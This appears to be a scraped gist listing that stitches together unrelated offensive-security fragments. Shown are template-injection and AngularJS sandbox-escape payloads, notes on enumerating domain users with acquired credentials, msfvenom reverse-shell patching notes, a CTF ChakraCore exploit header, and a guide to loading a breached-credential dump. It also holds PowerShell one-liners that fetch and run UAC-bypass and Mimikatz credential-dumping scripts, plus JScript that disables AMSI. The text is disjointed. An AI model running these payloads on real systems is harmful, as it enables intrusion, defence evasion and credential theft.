{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
w4fz5uck5
😃
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials. | |
| Install Apps | |
| Download and install visual studio 10 | |
| Downoad and install the Lync SDK | |
| https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated) | |
| http://go.microsoft.com/fwlink/?LinkID=248583 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 04 | |
| 05 | |
| 06 | |
| 07 | |
| 08 | |
| 09 |
mgeeky
/ msfvenom-reverse-tcp-WaitForSingleObject.md
Last active
November 14, 2023 19:45
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
eboda
/ exploit.js
Last active
September 14, 2021 13:20
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //////////////////////////////////////////////////////////////////////////// | |
| // | |
| // The vulnerability was that the following line of code could change the type of the | |
| // underlying Array from JavascriptNativeIntArray to JavascriptArray: | |
| // | |
| // spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE; | |
| // | |
| // As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed | |
| // was removed. If the aItem then is not a JavascriptArray, the following code path is taken: | |
| // else |
spacepatcher
/ Breach Compilation (1.4 billion credentials) in Postgres.md
Last active
July 11, 2024 14:47
Breach Compilation (1.4 billion credentials) in Postgres.md
What would you need:
- Postgres 9.3, 9.4, 9.5, 9.6 or 10 with cstore_fdw extention (https://github.com/citusdata/cstore_fdw)
- Docker 1.12.6 or higher
- Docker Compose
- Linux machine
Hardware requirements
This is a script for checking if any of the passwords you have stored in LastPass have been exposed through previous data breaches.
To use the script you need to have Python 3 installed and you need a CSV export of your LastPass vault. The export can be generated from the LastPass CLI with:
lpass export > lastpass.csv
or can be extracted with the browser plugin by going to the LastPass icon → More Options → Advanced → Export → LastPass CSV File (note that I did have problems getting this to work).
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var sh = new ActiveXObject('WScript.Shell'); | |
| var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; | |
| try{ | |
| var AmsiEnable = sh.RegRead(key); | |
| if(AmsiEnable!=0){ | |
| throw new Error(1, ''); | |
| } | |
| }catch(e){ | |
| sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI |
OlderNewer